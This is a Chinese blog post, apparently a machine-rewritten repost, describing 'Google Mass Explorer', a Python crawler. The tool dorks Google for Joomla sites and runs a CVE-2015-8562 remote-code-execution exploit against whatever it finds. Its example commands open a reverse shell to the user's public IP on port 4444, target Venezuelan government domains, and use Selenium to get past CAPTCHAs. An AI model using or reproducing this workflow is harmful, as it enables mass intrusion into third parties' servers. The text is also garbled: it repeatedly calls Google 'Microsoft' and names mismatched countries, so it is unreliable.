好用的Google漏洞爬虫:Google Mass Explorer
优采云 发布时间: 2020-06-26 08:01
这是一款基于微软搜索引擎的自动化爬虫。
爬虫大体机制就是:
先进行一次微软搜索,将结果解析为特定格式,然后再提供给exp使用。
大家可以尝试使用–help来列举所有参数。
这个项目笔者会持续更新,以后再添加新的exp进行升级。此外谷歌搜索爬虫,它会借助google_parsers模块去建立exp解析搜索结果,所以当你开始搜索时,可以选择“–exploit parser”参数来指定相应exp。
google parsers模块(google_parsers.py)以后就会继续优化,而现今的exp只富含joomla cve谷歌搜索爬虫,毕竟这个项目主要是给你们自己diy使用的。但是,如果你不会弄exp,把借助exp递交给过来也行。
由于笔者平常还是比较忙,所以没有太多时间去自动搜索目标。故而,笔者尝试使用Selenium框架去造了个爬虫来搜救测试目标。至于搜索过程中出现的Google的验证码,它须要其他库和模块来辅助解决。在项目里使用Selenium后,大家就可以在微软出现验证码的是时侯,自行自动输入验证码,然后爬虫就可以继续爬行了。这大约是笔者能想出的最好的解决验证码防护的办法了。
简单概述下爬虫是怎样工作的:
1. 执行微软搜索
2. 从每一页解析结果
3. 测试是否结果中富含漏洞
这个项目须要python3,使用requirements安装依赖库的方式如下:
$ sudo pip install -r requirements.txt
运行示例:
python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2015_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
在前面的事例里,笔者是在找寻匈牙利的joomla RCE目标,使用的是google_domains.txt上面的google域名(比如google.co.uk)来作为搜索引擎,“–last_update”则代表着搜索结果的更新时间为上个月。
上面事例里的选项适用于任何语言,主要决定于google针对相应的国家给出的句型。
下面再给出一个简单的事例:
python3 google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"
当然,这些exp也是可以单独使用的:
$ cd xpl_parsers
$ python joomla_cve_2015_8562.py
单独测试exp的方式:
$ cd exploits
$ python exploiter.py --file <vuln file>